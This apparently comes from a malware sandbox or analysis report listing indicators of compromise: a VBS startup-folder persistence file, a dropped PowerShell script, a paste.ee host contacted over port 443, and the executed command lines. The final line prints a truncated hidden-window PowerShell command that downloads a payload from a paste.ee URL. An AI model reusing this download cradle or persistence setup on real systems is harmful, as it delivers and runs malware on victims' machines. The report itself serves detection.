Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\edgeprocesshandler.vbs
- C:\users\public\e1gfb.ps1
- 'pa##e.ee':443
- DNS ASK pa##e.ee
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -File C:\Users\Public\E1gFB.PS1
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://paste.ee/r/E1gFB/0'); [String] ...' (with hidden window)